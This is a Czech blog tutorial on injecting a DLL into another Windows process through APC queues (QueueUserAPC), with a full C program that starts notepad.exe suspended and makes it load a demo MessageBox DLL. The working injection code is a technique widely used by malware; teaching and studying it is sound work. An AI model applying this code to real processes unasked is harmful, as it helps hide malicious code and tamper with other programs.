DLL injection s využitím APC

Existuje poměrně velké množství způsobů, jak nainjektovat kód do cizího procesu. Kromě těch notoricky známých technik, jakými jsou využití API funkce SetWindowsHookEx, VirtualAllocEx/CreateRemoteThread, registr AppInit_DLLs nebo SuspendThread/SetThreadContext (viz některý z příštích článků) existují i techniky, o kterých se až tak moc nemluví. Jednou z těchto technik je injekce kódu pomocí APC. Využitelná je jak v user-modu, tak kernel-modu. Pro potřeby tohoto článku si tentokrát vystačíme s metodou user-modu (Ring3).
Úvod
APC, neboli Asynchronous Procedure Call[1], je funkcionalita umožňující volat na Windows asynchronně procedury/funkce v kontextu aktuálně vykonávaného vlákna. Co to v praxi znamená? Každé vlákno má svou vlastní frontu. Zavoláním API funkce QueueUserAPC[2] dojde k nastavené procedury konkrétnímu vláknu. Vlákno čeká, dokud nedojde k přepnutí do pohotovostního stavu. Ve chvíli, kdy je vlákno přepnuto do pohotovostního stavu, dojde k přesměrování vykonávání kódu do APC fronty a k vykonání jednotlivých funkcí/procedur. Do pohotovostního stavu může být vlákno přepnuto například voláním API funkcí jako jsou SleepEx, SignalObjectAndWait, MsgWaitForMultipleObjectsEx, WaitForMultipleObjectsEx nebo WaitForSingleObjectEx. Jinými slovy se jedná o API funkce, které nějakým způsobem dočasně ‚přerušují‘ běh aplikace.
Teoretický přístup
Pro potřeby tohoto článku předpokládejme, že budeme vytvářet nový proces, ovšem výsledný kód se dá pohodlně upravit i pro běžící procesy. V prvním kroku si tedy vytvoříme nový proces v susendovaném stavu. V jeho adresním prostoru si alokujeme paměť pro argument API funkce LoadLibrary, tedy cestu k naší DLL knihovně a zapíšeme ji na tuto adresu. Nyní zařadíme do APC fronty naši funkci/proceduru. Na konec aplikaci uvolníme/spustíme ze suspendovaného stavu a čekáme, až se vykoná injektovaná DLL knihovna.
Praktický přístup
Pomocí API funkce CreateProcess vytvoříme nový proces (v našem případě třeba notepad.exe) v suspendovaném stavu. Protože proces vytváříme pomocí API funkce CreateProcess, není pro nás problém získat handle procesu. S jeho pomocí a API funkcí VirtualAlloc alokujeme v adresním prostoru procesu prostor pro argument API funkce LoadLibrary a pomocí API funkce WriteProcessMemory tento string do dané paměti zapíšeme. Teď přichází ta hlavní část: Voláním API funkce QueueUserAPC vytvoříme asynchronní volání pro API funkci LoadLibrary. Jako druhý argument potřebujeme zadat handle vlákna. Zde nám opět pomůže API funkce CreateProcess, jenž vrací handle hlavního vlákna v posledním parametru. Následuje závěrečné volání API funkce ResumeThread a čekání, až se hlavní vlákno aplikace dostane do pohotovostního stavu. V okamžiku, kdy k této skutečnosti dojde, dojde ke spuštění naší funkce/procedury (LoadLibrary).
Ukázkový kód
Aplikace se pokusí vytvořit nový proces notepad.exe a s pomocí APC v něm spustit DLL knihovnu s názvem test.dll, která obsahuje kód s API funkcí MessageBox. DLL knihovna není součástí kódu a předpokládá se, že si ji čtenář sám vytvoří.

#include 
#include 
int main(int argc, char *argv[]){
 STARTUPINFOA si = {};
 PROCESS_INFORMATION pi = {};
 HANDLE hMemory = NULL;
 char *szDllPath = "test.dll";
 char *szTargetProcess = "notepad.exe";
 printf("[+] Create suspended process\n");
 if(CreateProcessA(NULL, szTargetProcess, NULL, NULL,
      FALSE, CREATE_SUSPENDED, NULL,
      NULL, &si, &pi)){
  printf("[+] Allocate space for DLL path\n");
  hMemory = VirtualAllocEx(pi.hProcess, NULL,
         lstrlenA(szDllPath),
         MEM_COMMIT | MEM_RESERVE,
         PAGE_READWRITE);
  if(hMemory != NULL){
   printf("[+] Write DLL path into remote process\n");
   WriteProcessMemory(pi.hProcess, hMemory,
         szDllPath, lstrlenA(szDllPath),
         NULL);
   printf("[+] Add my procedure call into APC queue\n");
   QueueUserAPC((PAPCFUNC)GetProcAddress(LoadLibraryA("kernel32.dll"), "LoadLibraryA"),
       pi.hThread, (ULONG_PTR)hMemory);
   printf("[+] Run remote thread\n");
   ResumeThread(pi.hThread);
   CloseHandle(pi.hThread);
   CloseHandle(pi.hProcess);
   printf("[+] Done!\n-------------------\n");
  }else{
   printf("[-] ERROR! Space for DLL path wasn't allocated\n");
   printf("Error: %d\n", GetLastError());
  }
 }else{
  printf("[-] Suspended process wasn't created\n");
  printf("Error: %d\n", GetLastError());
 }
 return 0;
}

MessgeBox z DLL knihovny spuštěné pomocí APC
MessgeBox z DLL knihovny spuštěné pomocí APC

Odkazy
[1] – Asynchronous Procedure Calls
[2] – API funkce QueueUserAPC

Diskuze

Vaše e-mailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

Tato stránka používá Akismet k omezení spamu. Podívejte se, jak vaše data z komentářů zpracováváme..